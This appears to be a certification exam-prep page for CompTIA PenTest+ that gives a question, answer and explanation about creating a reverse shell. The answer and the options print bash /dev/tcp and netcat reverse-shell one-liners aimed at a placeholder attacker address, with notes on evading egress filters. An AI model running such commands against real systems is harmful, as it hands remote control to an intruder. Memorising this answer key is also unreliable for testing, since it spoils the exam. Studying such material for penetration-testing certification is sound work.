CompTIA
PT0-001 · Question #37
PT0-001 Question #37: Real Exam Question with Answer & Explanation
The correct answer is D: bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1. Bash treats a redirection to /dev/tcp/<host>/<port> as a request to open a TCP connection from inside the shell itself, so a reverse shell can be built with nothing installed on the victim, and port 443 is chosen because outbound HTTPS is the traffic most egress filters already allow.
Post-exploitation and lateral movement
Question
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
Options
- A. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;
- B. ssh superadmin@<DESTINATIONIP> -p 443
- C. nc -e /bin/sh <SOURCEIP> 443
- D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1
Explanation
bash -i starts an interactive shell. The redirection >& /dev/tcp/<DESTINATIONIP>/443 makes bash open a TCP connection to the attacker on port 443 and point both stdout and stderr at that socket; 0>&1 then duplicates the socket onto stdin, so every command typed on the attacker's listener is read by the victim's shell and its output travels back over the same connection. /dev/tcp is not a file on disk; it is a path bash recognises only when it appears as the target of a redirection, which is why the technique needs no extra tools on the victim. Because the connection is initiated outbound on a port the question says is unrestricted, it also passes a firewall that would block anything inbound. Two caveats matter in practice: the feature belongs to bash alone (sh, dash and busybox treat the path as a missing file), and it requires bash built with network redirections enabled, which most distribution builds are; a payload that may be executed via /bin/sh should therefore be wrapped in bash -c.
Common mistakes.
- A. The Perl snippet is malformed: the strings after <SOURCEIP> and in the $p assignment are never closed, so perl would fail to parse it, and even with the quoting repaired `use SOCKET` names a module that does not exist (the core module is `Socket`, and module names are case-sensitive). It also points at SOURCEIP rather than the attacker's address.
- B. SSH opens an outbound login session to the destination and needs valid credentials for superadmin there; the result is an authenticated session on that host, not a shell from the victim handed back to the attacker.
- C. Netcat's -e flag is absent from many builds (the OpenBSD netcat that Debian and Ubuntu install by default omits it), so the command is unreliable across targets compared with the bash built-in, and the option also names <SOURCEIP> instead of the attacker's address.
Concept tested. Bash reverse shell using built-in /dev/tcp redirection
Reference. https://www.gnu.org/software/bash/manual/bash.html#Redirections
Topics
#reverse shell #bash TCP redirect #port 443 #firewall evasion